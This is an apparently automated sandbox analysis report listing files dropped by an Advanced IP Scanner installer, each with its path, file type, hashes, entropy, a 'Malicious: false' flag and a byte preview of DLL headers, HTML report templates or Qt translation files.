Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......X....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-DUCRI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1256
Entropy (8bit):	5.1672203710221565
Encrypted:	false
SSDEEP:	24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
MD5:	38E55188530EE1FC3B88A22697957911
SHA1:	BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
SHA-256:	EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
SHA-512:	F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\is-DUVAI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22720
Entropy (8bit):	6.8330909328576315
Encrypted:	false
SSDEEP:	192:sYNpdkKBcyNWVghW/77l9YOCAs/nGfe4pBjSfCKZWNArXVWQ4mWuqnajMHxxBNT5:zuyNW2hWD7QA0GftpBjLKNplI663U4v
MD5:	5245F303E96166B8E625DD0A97E2D66A
SHA1:	1C9ED748763F1FF5B14B8C791A4C29DE753A96AB
SHA-256:	90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5
SHA-512:	AF51F341670F925449E69C4B5F0A82F4FC4EB32913943272C32E3F3F18EE43B4AFB78C0D7D2F965C1ABE6A0F3A368616DD7A4FB74D83D22D1B69B405AEF1E043
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-F3K6Q.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27282
Entropy (8bit):	4.801156368722529
Encrypted:	false
SSDEEP:	768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
MD5:	4DD48C8DA1964B46D4D972244288081A
SHA1:	1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
SHA-256:	572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
SHA-512:	59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
Malicious:	false
Preview:	<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=..y...P..y...-..%..#...0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.\|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q\|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........\|...c..D..;6..._..q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-F3P1S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.808850143987916
Encrypted:	false
SSDEEP:	24:lFouisuSPXqBQqHJl4/0Kt5RGDz9cReEhyv:HnisRPXqWqHJlK0U2Dz9+s
MD5:	3A9608446029B501A8C31084CA170B0E
SHA1:	E6643513E77B23997112741963B24C60EB4DF08C
SHA-256:	2C9A4462B5BCBDBFE9D7C8E167ECA3CC8DF7DD2440BA0BBE2ACA3E21BA1C4AF6
SHA-512:	58A3A091E8C03C6A83C17EF7FDE3A138EFC609FA9928801ACF75EAF7D19DED809B142940598558049AA12E9DB9F4D2C4D057FB10198D8ABCDCE2876FE983B990
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tillverkare:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anv.ndare:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Detaljer</c

C:\Program Files (x86)\Advanced IP Scanner\is-FRMIK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.908629649625132
Encrypted:	false
SSDEEP:	384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
MD5:	1FA7C2B81CDFD7ACE42A2A9A0781C946
SHA1:	F5B7117D18A7335228829447E3ECCC7B806EF478
SHA-256:	CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
SHA-512:	339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-G2GC2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1147
Entropy (8bit):	4.784372507341765
Encrypted:	false
SSDEEP:	24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
MD5:	04C416BEC9FE7DEC52E2F368353FF1F9
SHA1:	DB86325EDF8EED3639A26ED279A00EBC9208ED1E
SHA-256:	10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
SHA-512:	4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><

C:\Program Files (x86)\Advanced IP Scanner\is-G2LTO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1169
Entropy (8bit):	4.842737243338588
Encrypted:	false
SSDEEP:	24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
MD5:	59A017F97EA0743C741E972819CFEA19
SHA1:	E6480E68B930A8595EACBAC255B3BFAFCC30D466
SHA-256:	71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
SHA-512:	95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami

C:\Program Files (x86)\Advanced IP Scanner\is-G3D36.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.00674396465633
Encrypted:	false
SSDEEP:	192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
MD5:	906CB0C8ABA8342D552B0F37DDFD475F
SHA1:	A3CD528B9C212FEA97495A557A91D638B1608418
SHA-256:	582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
SHA-512:	27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-GAURI.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.789609676615686
Encrypted:	false
SSDEEP:	24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
MD5:	C81043ED485CCE96CDA08A5986F04E31
SHA1:	8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
SHA-256:	119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
SHA-512:	56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center

C:\Program Files (x86)\Advanced IP Scanner\is-GHBG6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26816
Entropy (8bit):	6.632501498817798
Encrypted:	false
SSDEEP:	384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
MD5:	809BC1010EAF714CD095189AF236CE2F
SHA1:	10DBC383F7C49DE17FC50E830E3CB494CC873DD1
SHA-256:	B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
SHA-512:	F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-GUAOM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	300584
Entropy (8bit):	5.864906645133905
Encrypted:	false
SSDEEP:	6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
MD5:	E8D9421848C1DDEA1A74EBFDBE452C67
SHA1:	7F1302F2B64FF785ABF85F5A9579EA12E555233B
SHA-256:	3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
SHA-512:	2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.HYT..YT..YT...<..[T...<..ST...<..ST...<..ZT..P,..PT..YT..oT...=..LT...=..XT...=x.XT...=..XT..RichYT..........................PE..L...Ki.]...........!.........t......O........ ............................................@..........................`..r......x.......<............z..(.......,....U..8............................U..@............................................text............................... ..`.rdata...E... ...F..................@..@.data...,....p.......R..............@....idata...............T..............@..@.00cfg...............^..............@..@.rsrc...<............`..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-H3TKG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28141
Entropy (8bit):	4.629516521520014
Encrypted:	false
SSDEEP:	384:XAbel+QUett3u72zMsS3z9K1A/TW/2bgH85qwDLEOghX5iNK+H:qQUetjTS3z9GAq/QcSqsLEM
MD5:	08AB1F12E7ED69CA493109B02A920C27
SHA1:	CD6433F48E1FA82747C57AE254E046BDEDC8A429
SHA-256:	943EB81FB1A7D11FC3CAA8D7E5E9DEC1C4940983D516F2B9612B68AF07E4CA44
SHA-512:	C00A5FF0C467F7A52AA837BD09234A4E4A959F6CE4D5EED773AC2FB7BAC9914A9748A54A41CA2269C240B5AF0644FB7B7A29286DA43D21B209E85D0E3713EEA0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..D....O..\....[..XZ...^..0e...^..T...(5......G....R..H,..Q...K...@...N:...Z..V...E..._...].......)\......Q=...y..Q................`......Y....t..+....t..R....t..\G.....A....j......5t......@...C...H5..Zu..f...0.......F....................~..3>...`..8....e..[.......[.......... =...G...y......y.../..%..%N..0..%w.+.....5.+.......+....f.+......+....'..G.... ..G....+e.H0...\..Hw9...Q.Hw9.....I....(..J6....Z.J6......J6......J6...J7.LD......L.b..\v.M.S..B,.R.....Z.V....0..Wi...[p.W.T.....Z.\|..R..[f3..V..gc....".w0K..H...H...&!......]^...T...;..."..5L...~..7... d..G....T......2....W......Z.......a1.9.E..A<.L.#..c..M$o.....e.......l8...77...^..Jn..I....h......C.......S.......Z...>...w..>......3../...l...K.......:..5.l..`C.AV...(..y....X....0..T.......S.......Z9..tb..6 ...............a......U.......>.......O..(....TB.1V...)..R....2/.W.<..`..f.~.."p......4...1........^..6....5..............c..G\.;6...bW.q.J..P...I....#..I

C:\Program Files (x86)\Advanced IP Scanner\is-H6NSK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.986049300390525
Encrypted:	false
SSDEEP:	192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
MD5:	FC13F11A2458879B23C87B29C2BAD934
SHA1:	68B15CC21F5541DC2226E9E967E08AF81D04A537
SHA-256:	624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
SHA-512:	801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...\|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-I6438.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1187
Entropy (8bit):	5.11658152620251
Encrypted:	false
SSDEEP:	24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
MD5:	7B64191A23A7F9EF19022435267FED84
SHA1:	3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
SHA-256:	58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
SHA-512:	F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>

C:\Program Files (x86)\Advanced IP Scanner\is-IE1PQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.0606914357897885
Encrypted:	false
SSDEEP:	192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
MD5:	A20084F41B3F1C549D6625C790B72268
SHA1:	E3669B8D89402A047BFBF9775D18438B0D95437E
SHA-256:	0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
SHA-512:	DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-IENMB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97464085764015
Encrypted:	false
SSDEEP:	192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
MD5:	3B3BD0AD4FEA16AB58FCAEAE4629879C
SHA1:	EB175F53640FB8AC4028A7657BBF48823A535677
SHA-256:	DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
SHA-512:	F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-IGVP5.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1151016
Entropy (8bit):	6.482547207070433
Encrypted:	false
SSDEEP:	24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:	ED04DAB88E70661E4980A284B0DF6A0C
SHA1:	C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:	9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:	E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-IL9T7.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.8708624632073105
Encrypted:	false
SSDEEP:	24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
MD5:	6A9A7FB51DD16A4EDBEAF52A7567EA70
SHA1:	27B2444894F6B432AD36CB14D79BAD1BA6529887
SHA-256:	C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
SHA-512:	E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
Malicious:	false
